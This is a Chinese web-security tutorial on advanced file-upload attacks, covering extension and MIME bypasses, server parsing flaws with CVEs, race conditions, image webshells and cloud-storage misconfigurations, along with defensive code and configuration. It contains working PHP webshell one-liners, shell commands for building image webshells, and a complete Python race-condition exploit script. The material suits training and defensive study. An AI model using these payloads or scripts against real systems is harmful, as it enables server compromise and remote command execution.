Day-051-文件上传漏洞进阶

# Day 49: 文件上传漏洞进阶

> Web 安全系列第 19 天 | 预计阅读时间：40 分钟 | 难度：★★★★☆

---

## 清单 目录

1. [文件上传漏洞回顾](#文件上传漏洞回顾)
2. [高级绕过技术](#高级绕过技术)
3. [解析漏洞深入](#解析漏洞深入)
4. [条件竞争攻击](#条件竞争攻击)
5. [图片马技术](#图片 马技术)
6. [云存储上传漏洞](#云存储上传漏洞)
7. [检测与利用流程](#检测与利用流程)
8. [实战案例分析](#实战案例分析)
9. [防护策略与最佳实践](#防护策略与最佳实践)
10. [总结与思考](#总结与思考)
11. [参考资料](#参考资料)

---

## 文件上传漏洞回顾

### 基础回顾

**漏洞原理**：
```
Web 应用允许用户上传文件，
但未正确验证文件类型、内容，
导致攻击者上传恶意文件（Webshell）。
```

**检测机制**：
```
1. 扩展名检查
   - 白名单/黑名单
   - 可被绕过

2. MIME 类型检查
   - Content-Type
   - 可被伪造

3. 魔术字节检查
   - 文件头检查
   - 可被添加

4. 内容检查
   - 扫描恶意代码
   - 可被混淆
```

### 常见上传点

**功能上传点**：
```
□ 头像上传
□ 文件分享
□ 文档上传
□ 图片上传
□ 备份导入
□ 插件安装
□ 主题上传
```

**隐藏上传点**：
```
□ 富文本编辑器
□ 附件上传
□ 日志导出
□ 报表生成
□ 数据导入
```

---

## 高级绕过技术

### 扩展名绕过

**双扩展名**：
```
shell.php.jpg
shell.asp;.jpg
shell.php%00.jpg

原理：
- 服务器从右向左解析
- 遇到可解析扩展名停止
- .php 被解析执行
```

**大小写绕过**：
```
Windows 不区分大小写：
shell.PHP
shell.Php
shell.pHP

Linux 可尝试：
shell.Php（某些配置可解析）
```

**特殊扩展名**：
```
Apache:
.php5, .php6, .phtml, .pht

IIS:
.asa, .asax, .cer, .cdx

Nginx:
配置不当可解析任意扩展名
```

**空格与点**：
```
shell.php.
shell.php 
shell.php%20
shell.php%0d%0a

原理：
- 某些系统自动修剪
- URL 解码后执行
```

### MIME 类型绕过

**伪造 MIME**：
```
正常图片 MIME：
image/jpeg
image/png
image/gif

攻击：
Content-Type: image/jpeg
（实际内容为 PHP）
```

**混合 MIME**：
```
Content-Type: multipart/form-data

边界：
--boundary
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: image/jpeg

（PHP 内容）
--boundary--
```

### 魔术字节绕过

**添加图片头**：
```php
// GIF89a 头
GIF89a
<?php system($_GET['c']); ?>

// PNG 头
\x89PNG\x0d\x0a\x1a\x0a
<?php system($_GET['c']); ?>

// JPEG 头
\xff\xd8\xff\xe0
<?php system($_GET['c']); ?>
```

**图片马制作**：
```bash
# 方法 1: 复制文件头
copy /b normal.jpg+shell.php shell.jpg

# 方法 2: 手动添加
echo -ne '\x89PNG\x0d\x0a\x1a\x0a' > shell.png
cat shell.php >> shell.png

# 方法 3: 使用工具
exiftool -Comment='<?php system($_GET["c"]); ?>' shell.jpg
```

---

## 解析漏洞深入

### Apache 解析漏洞

**CVE-2017-15715**：
```
影响版本：Apache 2.4.0-2.4.29

漏洞：
文件名含换行符可绕过黑名单

利用：
shell.php%0a.jpg

修复：
升级到 2.4.30+
```

**多扩展名解析**：
```
配置不当：
AddType application/x-httpd-php .jpg

利用：
shell.jpg 被当作 PHP 执行

修复：
正确配置 AddType
上传目录禁止 PHP
```

### Nginx 解析漏洞

**CVE-2013-4547**：
```
影响版本：Nginx 0.8.41-1.4.7 / 1.5.0-1.5.6

漏洞：
空格/点绕过

利用：
shell.php%20
shell.php.

修复：
升级到安全版本
```

**配置不当**：
```
错误配置：
location ~ \.php$ {
  fastcgi_pass ...
}

利用：
shell.jpg 被解析为 PHP

修复：
location ~ \.php$ {
  try_files $uri =404;
  fastcgi_pass ...
}
```

### IIS 解析漏洞

**CVE-2017-7269**：
```
影响版本：IIS 6.0

漏洞：
WebDAV 缓冲区溢出

利用：
远程代码执行
无需上传文件

修复：
禁用 WebDAV
打补丁
```

**扩展名解析**：
```
IIS 6.0:
/ shell.asp/xxx
/ shell.asa/xxx
/ shell.cer/xxx

原理：
IIS 6.0 解析逻辑问题
目录名作为扩展名

修复：
升级 IIS
配置请求过滤
```

### Tomcat 解析漏洞

**CVE-2017-12615**：
```
影响版本：Tomcat 7.0.0-7.0.81

漏洞：
PUT 方法上传 JSP

利用：
PUT /shell.jsp/ HTTP/1.1

修复：
升级到 7.0.82+
禁用 PUT 方法
```

---

## 条件竞争攻击

### 什么是条件竞争

**原理**：
```
1. 上传文件
2. 服务器检测
3. 移动文件到目标目录
4. 删除临时文件

攻击窗口：
步骤 2-3 之间，文件存在且可访问
```

### 攻击流程

```
步骤 1: 上传恶意文件
上传 shell.php

步骤 2: 快速访问
在文件被删除前访问
http://target.com/uploads/shell.php

步骤 3: 执行代码
如果访问成功，执行命令

步骤 4: 持续尝试
多线程、多连接
增加成功概率
```

### 自动化脚本

```python
#!/usr/bin/env python3
# race_condition.py
# 条件竞争攻击脚本

import requests
import threading

TARGET = 'http://target.com'
UPLOAD_URL = f'{TARGET}/upload.php'
SHELL_URL = f'{TARGET}/uploads/shell.php'
COMMAND = 'whoami'

def upload():
    """上传文件"""
    files = {'file': ('shell.php', '<?php system($_GET["c"]); ?>')}
    requests.post(UPLOAD_URL, files=files)

def access():
    """访问文件"""
    try:
        response = requests.get(f'{SHELL_URL}?c={COMMAND}')
        if response.status_code == 200 and response.text:
            print(f'[+] 成功！输出：{response.text}')
    except:
        pass

def race():
    """条件竞争攻击"""
    for _ in range(100):
        t1 = threading.Thread(target=upload)
        t2 = threading.Thread(target=access)
        
        t1.start()
        t2.start()
        
        t1.join()
        t2.join()

if __name__ == '__main__':
    race()
```

### 防护方法

```
1. 原子操作
   上传和验证原子完成
   无中间状态

2. 随机文件名
   使用随机文件名
   攻击者无法预测路径

3. 非 Web 目录
   上传到非 Web 目录
   无法直接访问

4. 下载方式访问
   通过脚本下载
   不直接暴露文件
```

---

## 图片马技术

### 什么是图片马

**定义**：
```
图片马是包含恶意代码的图片文件。
外观是正常图片，实际可执行代码。
```

**制作原理**：
```
1. 添加图片文件头
2. 插入恶意代码
3. 保持图片可显示
4. 服务器解析执行
```

### 图片马制作

**GIF 图片马**：
```bash
# 创建 GIF 头
echo -ne 'GIF89a' > shell.gif

# 添加 PHP 代码
echo '<?php system($_GET["c"]); ?>' >> shell.gif

# 上传
# 服务器检查 GIF 头通过
# 包含时执行 PHP
```

**PNG 图片马**：
```bash
# 创建 PNG 头
echo -ne '\x89PNG\x0d\x0a\x1a\x0a' > shell.png

# 添加 PHP 代码
echo '<?php system($_GET["c"]); ?>' >> shell.png

# 上传
# 服务器检查 PNG 头通过
# 包含时执行 PHP
```

**JPEG 图片马**：
```bash
# 创建 JPEG 头
echo -ne '\xff\xd8\xff\xe0' > shell.jpg

# 添加 PHP 代码
echo '<?php system($_GET["c"]); ?>' >> shell.jpg

# 上传
# 服务器检查 JPEG 头通过
# 包含时执行 PHP
```

### 图片马利用

**配合文件包含**：
```
1. 上传图片马
   shell.jpg（包含 PHP 代码）

2. 文件包含
   ?page=uploads/shell.jpg

3. 执行代码
   ?page=uploads/shell.jpg&c=whoami
```

**配合解析漏洞**：
```
1. 上传图片马
   shell.jpg

2. 利用解析漏洞
   /uploads/shell.jpg/.php

3. 执行代码
   服务器解析为 PHP 执行
```

---

## 云存储上传漏洞

### 云存储上传

**AWS S3**：
```
上传流程：
1. 获取预签名 URL
2. 上传文件到 S3
3. S3 存储文件

漏洞点：
- 预签名 URL 泄露
- 上传权限过大
- 文件验证不足
```

**阿里云 OSS**：
```
上传流程：
1. 获取上传凭证
2. 上传文件到 OSS
3. OSS 存储文件

漏洞点：
- 凭证泄露
- Bucket 权限配置错误
- 文件类型验证不足
```

### 云存储漏洞利用

**预签名 URL 泄露**：
```
获取预签名 URL：
https://bucket.s3.amazonaws.com/file?AWSAccessKeyId=xxx&Expires=xxx&Signature=xxx

利用：
- 上传恶意文件
- 下载敏感文件
- 删除文件
```

**Bucket 配置错误**：
```
公开读写：
- 任何人可上传
- 任何人可下载
- 任何人可删除

利用：
- 上传 Webshell
- 下载敏感数据
- 删除重要文件
```

### 云存储防护

**权限控制**：
```
1. 最小权限原则
   只授予必要权限

2. Bucket 策略
   限制访问来源

3. IAM 角色
   使用临时凭证
```

**文件验证**：
```
1. 服务端验证
   上传前验证文件

2. 内容扫描
   扫描恶意代码

3. 访问控制
   限制文件访问
```

---

## 检测与利用流程

### 手工检测

**步骤 1: 寻找上传点**：
```
□ 头像上传
□ 文件分享
□ 文档上传
□ 图片上传
□ 备份导入
```

**步骤 2: 测试基础上传**：
```
上传正常文件
观察响应
记录文件路径
```

**步骤 3: 测试恶意文件**：
```
上传 shell.php
观察是否被拦截
记录拦截信息
```

**步骤 4: 尝试绕过**：
```
修改扩展名
修改 MIME 类型
添加魔术字节
```

### 自动化工具

**Upload Scanner**：
```bash
# 安装
git clone https://github.com/whitel1st/file-upload-scanner

# 使用
python scanner.py -u http://target.com/upload
```

**Burp Suite**：
```
1. 拦截上传请求
2. 修改文件内容
3. 测试不同 Payload
4. 观察响应
```

### 利用流程

**信息收集**：
```
# 上传功能
# 文件类型限制
# 文件大小限制
# 存储路径
```

**绕过检测**：
```
# 扩展名绕过
# MIME 绕过
# 魔术字节绕过
# 内容检测绕过
```

**获取权限**：
```
# 上传 Webshell
# 访问 Webshell
# 执行命令
# 权限提升
```

---

## 实战案例分析

### 案例 1: CMS 文件上传漏洞

**漏洞描述**：
```
系统：某开源 CMS
漏洞：文件上传无验证
影响：远程代码执行
CVE: CVE-20XX-XXXX
```

**发现过程**：
```
1. 测试上传功能
   上传正常图片，成功

2. 测试恶意文件
   上传 shell.php，失败
   提示：不允许的文件类型

3. 尝试绕过
   shell.php.jpg → 成功
   shell.PHP → 成功

4. 验证执行
   访问 /uploads/shell.PHP
   执行命令成功
```

**利用过程**：
```
1. 制作图片马
   copy /b normal.jpg+shell.php shell.jpg

2. 上传图片马
   通过上传功能

3. 寻找包含点
   文件被包含执行

4. 获取权限
   执行系统命令
```

**修复方案**：
```
1. 严格白名单
   仅允许 jpg, jpeg, png, gif

2. 重命名文件
   使用随机文件名

3. 存储到非 Web 目录
   通过脚本访问

4. 禁止 PHP 执行
   上传目录配置
```

### 案例 2: 电商平台解析漏洞

**漏洞描述**：
```
平台：某大型电商
漏洞：Nginx 解析配置不当
影响：任意文件上传执行
```

**发现过程**：
```
1. 测试头像上传
   上传正常图片，成功

2. 测试 PHP 文件
   上传 shell.jpg
   访问 shell.jpg
   PHP 代码被执行

3. 分析原因
   Nginx 配置不当
   .jpg 被当作 PHP 解析
```

**Nginx 配置**：
```nginx
# 错误配置
location ~ \.php$ {
  fastcgi_pass ...
}

# 攻击者上传 shell.jpg
# 访问 shell.jpg
# 被当作 PHP 执行
```

**修复方案**：
```nginx
# 正确配置
location ~ \.php$ {
  try_files $uri =404;
  fastcgi_pass ...
}

# 上传目录禁止 PHP
location /uploads/ {
  location ~ \.php$ {
    deny all;
  }
}
```

---

## 防护策略与最佳实践

### 代码层面防护

**白名单机制**：
```php
// PHP 示例
$allowed_extensions = ['jpg', 'jpeg', 'png', 'gif'];
$ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));

if (!in_array($ext, $allowed_extensions)) {
    throw new Exception("Invalid file type");
}
```

**文件重命名**：
```php
// 随机文件名
$new_filename = bin2hex(random_bytes(16)) . '.' . $ext;

// 哈希文件名
$new_filename = hash('sha256', $original_filename) . '.' . $ext;
```

**内容验证**：
```php
// 魔术字节检查
$magic = file_get_contents($file, false, null, 0, 8);

if (substr($magic, 0, 4) !== "\x89PNG") {
    throw new Exception("Invalid PNG file");
}

// 内容扫描
if (preg_match('/<\?php/', file_get_contents($file))) {
    throw new Exception("Malicious content detected");
}
```

### 配置防护

**存储安全**：
```
1. 非 Web 目录
   上传到 /var/uploads/
   通过脚本访问

2. 权限控制
   chmod 755 /var/uploads
   chown www-data:www-data /var/uploads

3. 禁止执行
   <Directory "/var/uploads">
     php_flag engine off
   </Directory>
```

**Nginx 配置**：
```nginx
# 上传目录禁止 PHP
location /uploads/ {
  location ~ \.php$ {
    deny all;
  }
}

# 禁止访问隐藏文件
location ~ /\. {
  deny all;
}
```

### 运行时防护

**WAF 规则**：
```
检测上传文件：
- 扩展名检查
- MIME 类型检查
- 内容扫描

阻断可疑上传：
- 恶意扩展名
- 恶意内容
- 来源可疑
```

**监控告警**：
```
监控：
- 文件上传
- 异常扩展名
- 大文件上传

告警：
- 恶意文件上传
- 频繁上传尝试
- 异常文件访问
```

---

## 总结与思考

### 核心要点回顾

1. **上传漏洞原理**
   - 未正确验证文件
   - 检测机制可绕过
   - 解析配置不当

2. **绕过技术**
   - 扩展名绕过
   - MIME 绕过
   - 解析漏洞

3. **防护策略**
   - 白名单机制
   - 文件重命名
   - 非 Web 目录存储

### 深入思考问题

1. **为什么文件上传漏洞依然普遍**？
   - 业务需求复杂
   - 检测与体验平衡
   - 配置管理困难

2. **云环境下的风险**？
   - 对象存储服务
   - CDN 加速
   - 新的攻击面

3. **AI 辅助检测**？
   - 图像识别
   - 内容分析
   - 行为检测

### 实战建议

**开发人员**：
1. 使用白名单
2. 文件重命名
3. 非 Web 目录存储
4. 内容验证

**安全人员**：
1. 定期测试上传功能
2. 检查服务器配置
3. 监控异常上传
4. 渗透测试

**管理层**：
1. 安全预算投入
2. 安全开发生命周期
3. 第三方组件管理
4. 应急响应预案

---

## 漏洞挖掘方法论

### 系统化测试流程

**准备阶段**：
```
1. 环境搭建
   - 测试账户
   - 测试文件
   - 代理配置

2. 工具准备
   - Burp Suite
   - 图片编辑工具
   - 十六进制编辑器

3. 范围定义
   - 上传功能
   - 测试时间
   - 测试规则
```

**执行阶段**：
```
1. 信息收集
   - 上传点发现
   - 限制条件
   - 存储路径

2. 漏洞测试
   - 扩展名绕过
   - MIME 绕过
   - 内容检测绕过

3. 漏洞验证
   - 上传 Webshell
   - 访问 Webshell
   - 执行命令

4. 权限提升
   - 系统信息
   - 内网渗透
   - 持久化
```

**报告阶段**：
```
1. 编写报告
   - 漏洞描述
   - 复现步骤
   - 影响评估
   - 修复建议

2. 沟通修复
   - 提交报告
   - 协助修复
   - 验证修复

3. 跟踪闭环
   - 修复验证
   - 重新测试
   - 关闭漏洞
```

### 测试检查清单

**扩展名测试**：
```
□ .php
□ .php5
□ .php6
□ .phtml
□ .pht
□ .php%00.jpg
□ .php.
□ .php 
□ .PHP
□ .Php
```

**MIME 测试**：
```
□ image/jpeg
□ image/png
□ image/gif
□ application/octet-stream
□ text/plain
□ 空 MIME
```

**内容测试**：
```
□ 纯 PHP
□ GIF+PHP
□ PNG+PHP
□ JPEG+PHP
□ 混淆 PHP
□ 编码 PHP
```

**解析漏洞测试**：
```
□ Apache .htaccess
□ Nginx 空格/点
□ IIS 6.0 解析
□ Tomcat PUT
```

---

## 参考资料

### 学习资源
- [OWASP File Upload](https://cheatsheetseries.owasp.org/cheatsheets/File_Upload_Cheat_Sheet.html)
- [文件上传漏洞详解](https://www.sans.org/)
- [PortSwigger File Upload](https://portswigger.net/web-security/file-upload)

### 工具资源
- [Burp Suite](https://portswigger.net/burp)
- [Upload Scanner](https://github.com/whitel1st/file-upload-scanner)
- [ExifTool](https://exiftool.org/)

### 书籍推荐
- 《Web 安全深度剖析》
- 《文件上传漏洞攻防》
- 《白帽子讲 Web 安全》
- 《The Web Application Hacker's Handbook》

### 在线资源
- [HackerOne Reports](https://hackerone.com/hacktivity)
- [Bugcrowd University](https://www.bugcrowd.com/resources/)
- [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings)

---

**标记 明日预告**：Day 50 - 反序列化漏洞实战

> 本文内容仅供学习和研究使用，请勿用于非法目的。所有实验请在隔离环境中进行。

---

*本文是 365 天信息安全技术系列的第 49 篇，Web 安全部分第 19 篇，精编版本*